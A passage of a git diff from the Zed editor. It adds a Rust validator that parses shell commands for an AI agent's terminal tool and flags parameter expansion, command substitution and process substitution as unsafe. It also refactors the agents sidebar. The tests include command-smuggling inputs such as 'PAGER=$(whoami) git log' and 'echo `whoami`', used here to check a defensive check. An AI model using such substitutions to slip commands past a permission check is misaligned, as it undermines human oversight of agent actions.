word_validation(&here_doc.doc) + } else { + TerminalProgramValidation::Safe + } + } + ast::IoRedirect::HereString(_, word) | ast::IoRedirect::OutputAndError(word, _) => { + word_validation(word) + } + } +} + +fn assignment_validation(assignment: &ast::Assignment) -> TerminalProgramValidation { + match &assignment.value { + ast::AssignmentValue::Scalar(word) => word_validation(word), + ast::AssignmentValue::Array(words) => { + combine_validations(words.iter().flat_map(|(key, value)| { + key.iter() + .map(word_validation) + .chain(std::iter::once(word_validation(value))) + })) + } + } +} + +fn word_validation(word: &ast::Word) -> TerminalProgramValidation { + let options = ParserOptions::default(); + let pieces = match brush_parser::word::parse(&word.value, &options) { + Ok(pieces) => pieces, + Err(_) => return TerminalProgramValidation::Unsupported, + }; + + combine_validations( + pieces + .iter() + .map(|piece_with_source| word_piece_validation(&piece_with_source.piece)), + ) +} + +fn word_piece_validation(piece: &WordPiece) -> TerminalProgramValidation { + match piece { + WordPiece::Text(_) + | WordPiece::SingleQuotedText(_) + | WordPiece::AnsiCQuotedText(_) + | WordPiece::EscapeSequence(_) + | WordPiece::TildePrefix(_) => TerminalProgramValidation::Safe, + WordPiece::DoubleQuotedSequence(pieces) + | WordPiece::GettextDoubleQuotedSequence(pieces) => combine_validations( + pieces + .iter() + .map(|inner| word_piece_validation(&inner.piece)), + ), + WordPiece::ParameterExpansion(_) | WordPiece::ArithmeticExpression(_) => { + TerminalProgramValidation::Unsafe + } + WordPiece::CommandSubstitution(command) + | WordPiece::BackquotedCommandSubstitution(command) => { + let reader = BufReader::new(command.as_bytes()); + let options = ParserOptions::default(); + let source_info = SourceInfo::default(); + let mut parser = Parser::new(reader, &options, &source_info); + + match parser.parse_program() { + Ok(_) => TerminalProgramValidation::Unsafe, + Err(_) => 
TerminalProgramValidation::Unsupported, + } + } + } +} + +fn compound_command_validation( + compound_command: &ast::CompoundCommand, +) -> TerminalProgramValidation { + match compound_command { + ast::CompoundCommand::BraceGroup(brace_group) => { + compound_list_validation(&brace_group.list) + } + ast::CompoundCommand::Subshell(subshell) => compound_list_validation(&subshell.list), + ast::CompoundCommand::ForClause(for_clause) => combine_validations( + for_clause + .values + .iter() + .flat_map(|values| values.iter().map(word_validation)) + .chain(std::iter::once(do_group_validation(&for_clause.body))), + ), + ast::CompoundCommand::CaseClause(case_clause) => combine_validations( + std::iter::once(word_validation(&case_clause.value)) + .chain( + case_clause + .cases + .iter() + .flat_map(|item| item.cmd.iter().map(compound_list_validation)), + ) + .chain( + case_clause + .cases + .iter() + .flat_map(|item| item.patterns.iter().map(word_validation)), + ), + ), + ast::CompoundCommand::IfClause(if_clause) => combine_validations( + std::iter::once(compound_list_validation(&if_clause.condition)) + .chain(std::iter::once(compound_list_validation(&if_clause.then))) + .chain(if_clause.elses.iter().flat_map(|elses| { + elses.iter().flat_map(|else_item| { + else_item + .condition + .iter() + .map(compound_list_validation) + .chain(std::iter::once(compound_list_validation(&else_item.body))) + }) + })), + ), + ast::CompoundCommand::WhileClause(while_clause) + | ast::CompoundCommand::UntilClause(while_clause) => combine_validations([ + compound_list_validation(&while_clause.0), + do_group_validation(&while_clause.1), + ]), + ast::CompoundCommand::ArithmeticForClause(_) => TerminalProgramValidation::Unsafe, + ast::CompoundCommand::Arithmetic(_) => TerminalProgramValidation::Unsafe, + } +} + +fn do_group_validation(do_group: &ast::DoGroupCommand) -> TerminalProgramValidation { + compound_list_validation(&do_group.list) +} + +fn function_body_validation(function_body: 
&ast::FunctionBody) -> TerminalProgramValidation { + combine_validations( + std::iter::once(compound_command_validation(&function_body.0)) + .chain(function_body.1.iter().map(redirect_list_validation)), + ) +} + +fn redirect_list_validation(redirect_list: &ast::RedirectList) -> TerminalProgramValidation { + combine_validations(redirect_list.0.iter().map(io_redirect_validation)) +} + +fn extended_test_expr_validation( + test_expr: &ast::ExtendedTestExprCommand, +) -> TerminalProgramValidation { + extended_test_expr_inner_validation(&test_expr.expr) +} + +fn extended_test_expr_inner_validation(expr: &ast::ExtendedTestExpr) -> TerminalProgramValidation { + match expr { + ast::ExtendedTestExpr::Not(inner) | ast::ExtendedTestExpr::Parenthesized(inner) => { + extended_test_expr_inner_validation(inner) + } + ast::ExtendedTestExpr::And(left, right) | ast::ExtendedTestExpr::Or(left, right) => { + combine_validations([ + extended_test_expr_inner_validation(left), + extended_test_expr_inner_validation(right), + ]) + } + ast::ExtendedTestExpr::UnaryTest(_, word) => word_validation(word), + ast::ExtendedTestExpr::BinaryTest(_, left, right) => { + combine_validations([word_validation(left), word_validation(right)]) + } + } +} + +fn combine_validations( + validations: impl IntoIterator, +) -> TerminalProgramValidation { + let mut saw_unsafe = false; + let mut saw_unsupported = false; + + for validation in validations { + match validation { + TerminalProgramValidation::Unsupported => saw_unsupported = true, + TerminalProgramValidation::Unsafe => saw_unsafe = true, + TerminalProgramValidation::Safe => {} + } + } + + if saw_unsafe { + TerminalProgramValidation::Unsafe + } else if saw_unsupported { + TerminalProgramValidation::Unsupported + } else { + TerminalProgramValidation::Safe + } +} + fn extract_commands_from_program(program: &ast::Program, commands: &mut Vec) -> Option<()> { for complete_command in &program.complete_commands { 
extract_commands_from_compound_list(complete_command, commands)?; @@ -117,12 +572,26 @@ fn extract_commands_from_simple_command( if let Some(prefix) = &simple_command.prefix { for item in &prefix.0 { - if let ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) = item { - match normalize_io_redirect(redirect) { - Some(RedirectNormalization::Normalized(s)) => redirects.push(s), - Some(RedirectNormalization::Skip) => {} - None => return None, + match item { + ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) => { + match normalize_io_redirect(redirect) { + Some(RedirectNormalization::Normalized(s)) => redirects.push(s), + Some(RedirectNormalization::Skip) => {} + None => return None, + } + } + ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => { + match normalize_assignment_for_command_prefix(assignment, word)? { + NormalizedAssignment::Included(normalized_assignment) => { + words.push(normalized_assignment); + } + NormalizedAssignment::Skipped => {} + } + } + ast::CommandPrefixOrSuffixItem::Word(word) => { + words.push(normalize_word(word)?); } + ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => return None, } } } @@ -142,7 +611,15 @@ fn extract_commands_from_simple_command( None => return None, } } - _ => {} + ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => { + match normalize_assignment_for_command_prefix(assignment, word)? 
{ + NormalizedAssignment::Included(normalized_assignment) => { + words.push(normalized_assignment); + } + NormalizedAssignment::Skipped => {} + } + } + ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => {} } } } @@ -1061,4 +1538,220 @@ mod tests { let commands = extract_commands("cmd > /tmp/out 2>/dev/null").expect("parse failed"); assert_eq!(commands, vec!["cmd", "> /tmp/out"]); } + + #[test] + fn test_scalar_env_var_prefix_included_in_extracted_command() { + let commands = extract_commands("PAGER=blah git status").expect("parse failed"); + assert_eq!(commands, vec!["PAGER=blah git status"]); + } + + #[test] + fn test_multiple_scalar_assignments_preserved_in_order() { + let commands = extract_commands("A=1 B=2 git log").expect("parse failed"); + assert_eq!(commands, vec!["A=1 B=2 git log"]); + } + + #[test] + fn test_assignment_quoting_dropped_when_safe() { + let commands = extract_commands("PAGER='curl' git log").expect("parse failed"); + assert_eq!(commands, vec!["PAGER=curl git log"]); + } + + #[test] + fn test_assignment_quoting_preserved_for_whitespace() { + let commands = extract_commands("PAGER='less -R' git log").expect("parse failed"); + assert_eq!(commands, vec!["PAGER='less -R' git log"]); + } + + #[test] + fn test_assignment_quoting_preserved_for_semicolon() { + let commands = extract_commands("PAGER='a;b' git log").expect("parse failed"); + assert_eq!(commands, vec!["PAGER='a;b' git log"]); + } + + #[test] + fn test_array_assignments_ignored_for_prefix_matching_output() { + let commands = extract_commands("FOO=(a b) git status").expect("parse failed"); + assert_eq!(commands, vec!["git status"]); + } + + #[test] + fn test_extract_terminal_command_prefix_includes_env_var_prefix_and_subcommand() { + let prefix = extract_terminal_command_prefix("PAGER=blah git log --oneline") + .expect("expected terminal command prefix"); + + assert_eq!( + prefix, + TerminalCommandPrefix { + normalized: "PAGER=blah git log".to_string(), + display: "PAGER=blah 
git log".to_string(), + tokens: vec![ + "PAGER=blah".to_string(), + "git".to_string(), + "log".to_string(), + ], + command: "git".to_string(), + subcommand: Some("log".to_string()), + } + ); + } + + #[test] + fn test_extract_terminal_command_prefix_preserves_required_assignment_quotes_in_display_and_normalized() + { + let prefix = extract_terminal_command_prefix("PAGER='less -R' git log") + .expect("expected terminal command prefix"); + + assert_eq!( + prefix, + TerminalCommandPrefix { + normalized: "PAGER='less -R' git log".to_string(), + display: "PAGER='less -R' git log".to_string(), + tokens: vec![ + "PAGER='less -R'".to_string(), + "git".to_string(), + "log".to_string(), + ], + command: "git".to_string(), + subcommand: Some("log".to_string()), + } + ); + } + + #[test] + fn test_extract_terminal_command_prefix_skips_redirects_before_subcommand() { + let prefix = extract_terminal_command_prefix("git 2>/dev/null log --oneline") + .expect("expected terminal command prefix"); + + assert_eq!( + prefix, + TerminalCommandPrefix { + normalized: "git log".to_string(), + display: "git 2>/dev/null log".to_string(), + tokens: vec!["git".to_string(), "log".to_string()], + command: "git".to_string(), + subcommand: Some("log".to_string()), + } + ); + } + + #[test] + fn test_validate_terminal_command_rejects_parameter_expansion() { + assert_eq!( + validate_terminal_command("echo $HOME"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_braced_parameter_expansion() { + assert_eq!( + validate_terminal_command("echo ${HOME}"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_special_parameters() { + assert_eq!( + validate_terminal_command("echo $?"), + TerminalCommandValidation::Unsafe + ); + assert_eq!( + validate_terminal_command("echo $$"), + TerminalCommandValidation::Unsafe + ); + assert_eq!( + validate_terminal_command("echo $@"), + TerminalCommandValidation::Unsafe + ); 
+ } + + #[test] + fn test_validate_terminal_command_rejects_command_substitution() { + assert_eq!( + validate_terminal_command("echo $(whoami)"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_backticks() { + assert_eq!( + validate_terminal_command("echo `whoami`"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_arithmetic_expansion() { + assert_eq!( + validate_terminal_command("echo $((1 + 1))"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_process_substitution() { + assert_eq!( + validate_terminal_command("cat <(ls)"), + TerminalCommandValidation::Unsafe + ); + assert_eq!( + validate_terminal_command("ls >(cat)"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_forbidden_constructs_in_env_var_assignments() { + assert_eq!( + validate_terminal_command("PAGER=$HOME git log"), + TerminalCommandValidation::Unsafe + ); + assert_eq!( + validate_terminal_command("PAGER=$(whoami) git log"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_returns_unsupported_for_parse_failure() { + assert_eq!( + validate_terminal_command("echo $(ls &&)"), + TerminalCommandValidation::Unsupported + ); + } + + #[test] + fn test_validate_terminal_command_rejects_substitution_in_case_pattern() { + assert_ne!( + validate_terminal_command("case x in $(echo y)) echo z;; esac"), + TerminalCommandValidation::Safe + ); + } + + #[test] + fn test_validate_terminal_command_safe_case_clause_without_substitutions() { + assert_eq!( + validate_terminal_command("case x in foo) echo hello;; esac"), + TerminalCommandValidation::Safe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_substitution_in_arithmetic_for_clause() { + assert_ne!( + validate_terminal_command("for ((i=$(echo 0); i<3; i++)); do echo hello; done"), + 
TerminalCommandValidation::Safe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_arithmetic_for_clause_unconditionally() { + assert_eq!( + validate_terminal_command("for ((i=0; i<3; i++)); do echo hello; done"), + TerminalCommandValidation::Unsafe + ); + } } diff --git a/crates/sidebar/Cargo.toml b/crates/sidebar/Cargo.toml index 6165a41c68894df9ad60110663562df713a24470..d76fd139557dd10438d7cf98f9168d87dcae9804 100644 --- a/crates/sidebar/Cargo.toml +++ b/crates/sidebar/Cargo.toml @@ -13,30 +13,51 @@ path = "src/sidebar.rs" [features] default = [] -test-support = [] [dependencies] acp_thread.workspace = true -agent_ui.workspace = true +action_log.workspace = true +agent.workspace = true +agent-client-protocol.workspace = true +agent_settings.workspace = true +agent_ui = { workspace = true, features = ["audio"] } +anyhow.workspace = true chrono.workspace = true +editor.workspace = true +feature_flags.workspace = true fs.workspace = true -fuzzy.workspace = true +git.workspace = true gpui.workspace = true -picker.workspace = true +menu.workspace = true +platform_title_bar.workspace = true project.workspace = true recent_projects.workspace = true +remote.workspace = true +serde.workspace = true +serde_json.workspace = true +settings.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true -ui_input.workspace = true util.workspace = true +vim_mode_setting.workspace = true workspace.workspace = true +zed_actions.workspace = true [dev-dependencies] +acp_thread = { workspace = true, features = ["test-support"] } +agent = { workspace = true, features = ["test-support"] } +agent_ui = { workspace = true, features = ["test-support"] } editor.workspace = true +language_model = { workspace = true, features = ["test-support"] } +pretty_assertions.workspace = true +prompt_store.workspace = true +recent_projects = { workspace = true, features = ["test-support"] } +serde_json.workspace = true feature_flags.workspace = true fs = { 
workspace = true, features = ["test-support"] } +git.workspace = true gpui = { workspace = true, features = ["test-support"] } project = { workspace = true, features = ["test-support"] } -recent_projects = { workspace = true, features = ["test-support"] } settings = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/sidebar/src/sidebar.rs b/crates/sidebar/src/sidebar.rs index 24974512cda12276b5fcdc51ebd71d091782dff6..d6589361cd9417c2ac6d9025af92f1e096b341b1 100644 --- a/crates/sidebar/src/sidebar.rs +++ b/crates/sidebar/src/sidebar.rs @@ -1,1273 +1,4002 @@ -use acp_thread::ThreadStatus; -use agent_ui::{AgentPanel, AgentPanelEvent}; -use chrono::{Datelike, Local, NaiveDate, TimeDelta}; +mod thread_switcher; -use fs::Fs; -use fuzzy::StringMatchCandidate; +use acp_thread::ThreadStatus; +use action_log::DiffStats; +use agent_client_protocol::{self as acp}; +use agent_settings::AgentSettings; +use agent_ui::thread_metadata_store::{ThreadMetadata, ThreadMetadataStore}; +use agent_ui::threads_archive_view::{ + ThreadsArchiveView, ThreadsArchiveViewEvent, format_history_entry_timestamp, +}; +use agent_ui::{AcpThreadImportOnboarding, ThreadImportModal}; +use agent_ui::{ + Agent, AgentPanel, AgentPanelEvent, DEFAULT_THREAD_TITLE, NewThread, RemoveSelectedThread, +}; +use chrono::{DateTime, Utc}; +use editor::Editor; +use feature_flags::{AgentV2FeatureFlag, FeatureFlagViewExt as _}; use gpui::{ - App, Context, Entity, EventEmitter, FocusHandle, Focusable, Pixels, Render, SharedString, - Subscription, Task, Window, px, + Action as _, AnyElement, App, Context, Entity, FocusHandle, Focusable, KeyContext, ListState, + Pixels, Render, SharedString, WeakEntity, Window, WindowHandle, linear_color_stop, + linear_gradient, list, prelude::*, px, }; -use picker::{Picker, PickerDelegate}; -use project::Event as ProjectEvent; -use recent_projects::{RecentProjectEntry, get_recent_projects}; -use 
std::fmt::Display; +use menu::{ + Cancel, Confirm, SelectChild, SelectFirst, SelectLast, SelectNext, SelectParent, SelectPrevious, +}; +use project::{ + AgentId, AgentRegistryStore, Event as ProjectEvent, ProjectGroupKey, linked_worktree_short_name, +}; +use recent_projects::sidebar_recent_projects::SidebarRecentProjects; +use remote::RemoteConnectionOptions; +use ui::utils::platform_title_bar_height; +use serde::{Deserialize, Serialize}; +use settings::Settings as _; use std::collections::{HashMap, HashSet}; - -use std::path::{Path, PathBuf}; -use std::sync::Arc; +use std::mem; +use std::rc::Rc; use theme::ActiveTheme; -use ui::utils::TRAFFIC_LIGHT_PADDING; use ui::{ - AgentThreadStatus, Divider, DividerColor, KeyBinding, ListSubHeader, Tab, ThreadItem, Tooltip, - prelude::*, + AgentThreadStatus, CommonAnimationExt, ContextMenu, Divider, HighlightedLabel, KeyBinding, + PopoverMenu, PopoverMenuHandle, Tab, ThreadItem, ThreadItemWorktreeInfo, TintColor, Tooltip, + WithScrollbar, prelude::*, }; -use ui_input::ErasedEditor; use util::ResultExt as _; +use util::path_list::{PathList, SerializedPathList}; use workspace::{ - FocusWorkspaceSidebar, MultiWorkspace, NewWorkspaceInWindow, Sidebar as WorkspaceSidebar, - SidebarEvent, ToggleWorkspaceSidebar, Workspace, + AddFolderToProject, CloseWindow, FocusWorkspaceSidebar, MultiWorkspace, MultiWorkspaceEvent, + Open, Sidebar as WorkspaceSidebar, SidebarSide, ToggleWorkspaceSidebar, Workspace, WorkspaceId, + sidebar_side_context_menu, }; -#[derive(Clone, Debug)] -struct AgentThreadInfo { - title: SharedString, - status: AgentThreadStatus, - icon: IconName, -} +use zed_actions::OpenRecent; +use zed_actions::editor::{MoveDown, MoveUp}; -const DEFAULT_WIDTH: Pixels = px(320.0); +use zed_actions::agents_sidebar::{FocusSidebarFilter, ToggleThreadSwitcher}; + +use crate::thread_switcher::{ThreadSwitcher, ThreadSwitcherEntry, ThreadSwitcherEvent}; + +#[cfg(test)] +mod sidebar_tests; + +gpui::actions!( + agents_sidebar, + [ + /// 
Creates a new thread in the currently selected or active project group. + NewThreadInGroup, + /// Toggles between the thread list and the archive view. + ToggleArchive, + ] +); + +gpui::actions!( + dev, + [ + /// Dumps multi-workspace state (projects, worktrees, active threads) into a new buffer. + DumpWorkspaceInfo, + ] +); + +const DEFAULT_WIDTH: Pixels = px(300.0); const MIN_WIDTH: Pixels = px(200.0); const MAX_WIDTH: Pixels = px(800.0); -const MAX_MATCHES: usize = 100; +const DEFAULT_THREADS_SHOWN: usize = 5; -#[derive(Clone)] -struct WorkspaceThreadEntry { - index: usize, - worktree_label: SharedString, - full_path: SharedString, - thread_info: Option, +#[derive(Default, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)] +enum SerializedSidebarView { + #[default] + ThreadList, + Archive, } -impl WorkspaceThreadEntry { - fn new(index: usize, workspace: &Entity, cx: &App) -> Self { - let workspace_ref = workspace.read(cx); - - let worktrees: Vec<_> = workspace_ref - .worktrees(cx) - .filter(|worktree| worktree.read(cx).is_visible()) - .map(|worktree| worktree.read(cx).abs_path()) - .collect(); +#[derive(Default, Serialize, Deserialize)] +struct SerializedSidebar { + #[serde(default)] + width: Option, + #[serde(default)] + collapsed_groups: Vec, + #[serde(default)] + expanded_groups: Vec<(SerializedPathList, usize)>, + #[serde(default)] + active_view: SerializedSidebarView, +} - let worktree_names: Vec = worktrees - .iter() - .filter_map(|path| { - path.file_name() - .map(|name| name.to_string_lossy().to_string()) - }) - .collect(); +#[derive(Debug, Default)] +enum SidebarView { + #[default] + ThreadList, + Archive(Entity), +} - let worktree_label: SharedString = if worktree_names.is_empty() { - format!("Workspace {}", index + 1).into() - } else { - worktree_names.join(", ").into() - }; +#[derive(Clone, Debug)] +enum ActiveEntry { + Thread { + session_id: acp::SessionId, + workspace: Entity, + }, + Draft(Entity), +} - let full_path: SharedString = worktrees - 
.iter() - .map(|path| path.to_string_lossy().to_string()) - .collect::>() - .join("\n") - .into(); +impl ActiveEntry { + fn workspace(&self) -> &Entity { + match self { + ActiveEntry::Thread { workspace, .. } => workspace, + ActiveEntry::Draft(workspace) => workspace, + } + } - let thread_info = Self::thread_info(workspace, cx); + fn is_active_thread(&self, session_id: &acp::SessionId) -> bool { + matches!(self, ActiveEntry::Thread { session_id: id, .. } if id == session_id) + } - Self { - index, - worktree_label, - full_path, - thread_info, + fn matches_entry(&self, entry: &ListEntry) -> bool { + match (self, entry) { + (ActiveEntry::Thread { session_id, .. }, ListEntry::Thread(thread)) => { + thread.metadata.session_id == *session_id + } + (ActiveEntry::Draft(_workspace), ListEntry::DraftThread { .. }) => true, + _ => false, } } +} - fn thread_info(workspace: &Entity, cx: &App) -> Option { - let agent_panel = workspace.read(cx).panel::(cx)?; - let agent_panel_ref = agent_panel.read(cx); +#[derive(Clone, Debug)] +struct ActiveThreadInfo { + session_id: acp::SessionId, + title: SharedString, + status: AgentThreadStatus, + icon: IconName, + icon_from_external_svg: Option, + is_background: bool, + is_title_generating: bool, + diff_stats: DiffStats, +} - let thread_view = agent_panel_ref.as_active_thread_view(cx)?.read(cx); - let thread = thread_view.thread.read(cx); +#[derive(Clone)] +enum ThreadEntryWorkspace { + Open(Entity), + Closed(PathList), +} - let icon = thread_view.agent_icon; - let title = thread.title(); +#[derive(Clone)] +struct WorktreeInfo { + name: SharedString, + full_path: SharedString, + highlight_positions: Vec, +} - let status = if thread.is_waiting_for_confirmation() { - AgentThreadStatus::WaitingForConfirmation - } else if thread.had_error() { - AgentThreadStatus::Error - } else { - match thread.status() { - ThreadStatus::Generating => AgentThreadStatus::Running, - ThreadStatus::Idle => AgentThreadStatus::Completed, - } - }; - 
Some(AgentThreadInfo { - title, - status, - icon, - }) +#[derive(Clone)] +struct ThreadEntry { + metadata: ThreadMetadata, + icon: IconName, + icon_from_external_svg: Option, + status: AgentThreadStatus, + workspace: ThreadEntryWorkspace, + is_live: bool, + is_background: bool, + is_title_generating: bool, + highlight_positions: Vec, + worktrees: Vec, + diff_stats: DiffStats, +} + +impl ThreadEntry { + /// Updates this thread entry with active thread information. + /// + /// The existing [`ThreadEntry`] was likely deserialized from the database + /// but if we have a correspond thread already loaded we want to apply the + /// live information. + fn apply_active_info(&mut self, info: &ActiveThreadInfo) { + self.metadata.title = info.title.clone(); + self.status = info.status; + self.icon = info.icon; + self.icon_from_external_svg = info.icon_from_external_svg.clone(); + self.is_live = true; + self.is_background = info.is_background; + self.is_title_generating = info.is_title_generating; + self.diff_stats = info.diff_stats; } } #[derive(Clone)] -enum SidebarEntry { - Separator(SharedString), - WorkspaceThread(WorkspaceThreadEntry), - RecentProject(RecentProjectEntry), +enum ListEntry { + ProjectHeader { + key: ProjectGroupKey, + label: SharedString, + highlight_positions: Vec, + has_running_threads: bool, + waiting_thread_count: usize, + is_active: bool, + }, + Thread(ThreadEntry), + ViewMore { + key: ProjectGroupKey, + is_fully_expanded: bool, + }, + /// The user's active draft thread. Shows a prefix of the currently-typed + /// prompt, or "Untitled Thread" if the prompt is empty. + DraftThread { + worktrees: Vec, + }, + /// A convenience row for starting a new thread. Shown when a project group + /// has no threads, or when the active workspace contains linked worktrees + /// with no threads for that specific worktree set. 
+ NewThread { + key: project::ProjectGroupKey, + worktrees: Vec, + }, } -impl SidebarEntry { - fn searchable_text(&self) -> &str { +#[cfg(test)] +impl ListEntry { + fn session_id(&self) -> Option<&acp::SessionId> { match self { - SidebarEntry::Separator(_) => "", - SidebarEntry::WorkspaceThread(entry) => entry.worktree_label.as_ref(), - SidebarEntry::RecentProject(entry) => entry.name.as_ref(), + ListEntry::Thread(thread_entry) => Some(&thread_entry.metadata.session_id), + _ => None, } } } -#[derive(Clone)] -struct SidebarMatch { - entry: SidebarEntry, - positions: Vec, +impl From for ListEntry { + fn from(thread: ThreadEntry) -> Self { + ListEntry::Thread(thread) + } } -struct WorkspacePickerDelegate { - multi_workspace: Entity, - entries: Vec, - active_workspace_index: usize, - workspace_thread_count: usize, - /// All recent projects including what's filtered out of entries - /// used to add unopened projects to entries on rebuild - recent_projects: Vec, - recent_project_thread_titles: HashMap, - matches: Vec, - selected_index: usize, - query: String, - hovered_thread_item: Option, - notified_workspaces: HashSet, +#[derive(Default)] +struct SidebarContents { + entries: Vec, + notified_threads: HashSet, + project_header_indices: Vec, + has_open_projects: bool, } -impl WorkspacePickerDelegate { - fn new(multi_workspace: Entity) -> Self { - Self { - multi_workspace, - entries: Vec::new(), - active_workspace_index: 0, - workspace_thread_count: 0, - recent_projects: Vec::new(), - recent_project_thread_titles: HashMap::new(), - matches: Vec::new(), - selected_index: 0, - query: String::new(), - hovered_thread_item: None, - notified_workspaces: HashSet::new(), - } +impl SidebarContents { + fn is_thread_notified(&self, session_id: &acp::SessionId) -> bool { + self.notified_threads.contains(session_id) } +} - fn set_entries( - &mut self, - workspace_threads: Vec, - active_workspace_index: usize, - cx: &App, - ) { - if let Some(hovered_index) = self.hovered_thread_item { - 
let still_exists = workspace_threads - .iter() - .any(|thread| thread.index == hovered_index); - if !still_exists { - self.hovered_thread_item = None; - } - } - - let old_statuses: HashMap = self - .entries - .iter() - .filter_map(|entry| match entry { - SidebarEntry::WorkspaceThread(thread) => thread - .thread_info - .as_ref() - .map(|info| (thread.index, info.status)), - _ => None, - }) - .collect(); +fn fuzzy_match_positions(query: &str, candidate: &str) -> Option> { + let mut positions = Vec::new(); + let mut query_chars = query.chars().peekable(); - for thread in &workspace_threads { - if let Some(info) = &thread.thread_info { - if info.status == AgentThreadStatus::Completed - && thread.index != active_workspace_index - { - if old_statuses.get(&thread.index) == Some(&AgentThreadStatus::Running) { - self.notified_workspaces.insert(thread.index); - } - } + for (byte_idx, candidate_char) in candidate.char_indices() { + if let Some(&query_char) = query_chars.peek() { + if candidate_char.eq_ignore_ascii_case(&query_char) { + positions.push(byte_idx); + query_chars.next(); } + } else { + break; } - - if self.active_workspace_index != active_workspace_index { - self.notified_workspaces.remove(&active_workspace_index); - } - self.active_workspace_index = active_workspace_index; - self.workspace_thread_count = workspace_threads.len(); - self.rebuild_entries(workspace_threads, cx); } - fn set_recent_projects(&mut self, recent_projects: Vec, cx: &App) { - self.recent_project_thread_titles.clear(); - - self.recent_projects = recent_projects; - - let workspace_threads: Vec = self - .entries - .iter() - .filter_map(|entry| match entry { - SidebarEntry::WorkspaceThread(thread) => Some(thread.clone()), - _ => None, - }) - .collect(); - self.rebuild_entries(workspace_threads, cx); + if query_chars.peek().is_none() { + Some(positions) + } else { + None } +} - fn open_workspace_path_sets(&self, cx: &App) -> Vec>> { - self.multi_workspace - .read(cx) - .workspaces() +// TODO: The 
mapping from workspace root paths to git repositories needs a +// unified approach across the codebase: this function, `AgentPanel::classify_worktrees`, +// thread persistence (which PathList is saved to the database), and thread +// querying (which PathList is used to read threads back). All of these need +// to agree on how repos are resolved for a given workspace, especially in +// multi-root and nested-repo configurations. +fn root_repository_snapshots( + workspace: &Entity, + cx: &App, +) -> impl Iterator { + let path_list = workspace_path_list(workspace, cx); + let project = workspace.read(cx).project().read(cx); + project.repositories(cx).values().filter_map(move |repo| { + let snapshot = repo.read(cx).snapshot(); + let is_root = path_list + .paths() .iter() - .map(|workspace| { - let mut paths = workspace.read(cx).root_paths(cx); - paths.sort(); - paths - }) - .collect() - } - - fn rebuild_entries(&mut self, workspace_threads: Vec, cx: &App) { - let open_path_sets = self.open_workspace_path_sets(cx); + .any(|p| p.as_path() == snapshot.work_directory_abs_path.as_ref()); + is_root.then_some(snapshot) + }) +} - self.entries.clear(); +fn workspace_path_list(workspace: &Entity, cx: &App) -> PathList { + PathList::new(&workspace.read(cx).root_paths(cx)) +} - if !workspace_threads.is_empty() { - self.entries - .push(SidebarEntry::Separator("Active Workspaces".into())); - for thread in workspace_threads { - self.entries.push(SidebarEntry::WorkspaceThread(thread)); +/// Derives worktree display info from a thread's stored path list. +/// +/// For each path in the thread's `folder_paths` that is not one of the +/// group's main paths (i.e. it's a git linked worktree), produces a +/// [`WorktreeInfo`] with the short worktree name and full path. 
+fn worktree_info_from_thread_paths( + folder_paths: &PathList, + group_key: &project::ProjectGroupKey, +) -> Vec { + let main_paths = group_key.path_list().paths(); + folder_paths + .paths() + .iter() + .filter_map(|path| { + if main_paths.iter().any(|mp| mp.as_path() == path.as_path()) { + return None; } - } - - let recent: Vec<_> = self - .recent_projects - .iter() - .filter(|project| { - let mut project_paths: Vec<&Path> = - project.paths.iter().map(|p| p.as_path()).collect(); - project_paths.sort(); - !open_path_sets.iter().any(|open_paths| { - open_paths.len() == project_paths.len() - && open_paths - .iter() - .zip(&project_paths) - .all(|(a, b)| a.as_ref() == *b) - }) + // Find the main path whose file name matches this linked + // worktree's file name, falling back to the first main path. + let main_path = main_paths + .iter() + .find(|mp| mp.file_name() == path.file_name()) + .or(main_paths.first())?; + Some(WorktreeInfo { + name: linked_worktree_short_name(main_path, path).unwrap_or_default(), + full_path: SharedString::from(path.display().to_string()), + highlight_positions: Vec::new(), }) - .cloned() - .collect(); + }) + .collect() +} - if !recent.is_empty() { - let today = Local::now().naive_local().date(); - let mut current_bucket: Option = None; +/// The sidebar re-derives its entire entry list from scratch on every +/// change via `update_entries` → `rebuild_contents`. Avoid adding +/// incremental or inter-event coordination state — if something can +/// be computed from the current world state, compute it in the rebuild. +pub struct Sidebar { + multi_workspace: WeakEntity, + width: Pixels, + focus_handle: FocusHandle, + filter_editor: Entity, + list_state: ListState, + contents: SidebarContents, + /// The index of the list item that currently has the keyboard focus + /// + /// Note: This is NOT the same as the active item. + selection: Option, + /// Tracks which sidebar entry is currently active (highlighted). 
+ active_entry: Option, + hovered_thread_index: Option, + collapsed_groups: HashSet, + expanded_groups: HashMap, + /// Updated only in response to explicit user actions (clicking a + /// thread, confirming in the thread switcher, etc.) — never from + /// background data changes. Used to sort the thread switcher popup. + thread_last_accessed: HashMap>, + /// Updated when the user presses a key to send or queue a message. + /// Used for sorting threads in the sidebar and as a secondary sort + /// key in the thread switcher. + thread_last_message_sent_or_queued: HashMap>, + thread_switcher: Option>, + _thread_switcher_subscriptions: Vec, + view: SidebarView, + recent_projects_popover_handle: PopoverMenuHandle, + project_header_menu_ix: Option, + _subscriptions: Vec, + _draft_observation: Option, +} - for project in recent { - let entry_date = project.timestamp.with_timezone(&Local).naive_local().date(); - let bucket = TimeBucket::from_dates(today, entry_date); +impl Sidebar { + pub fn new( + multi_workspace: Entity, + window: &mut Window, + cx: &mut Context, + ) -> Self { + let focus_handle = cx.focus_handle(); + cx.on_focus_in(&focus_handle, window, Self::focus_in) + .detach(); + + let filter_editor = 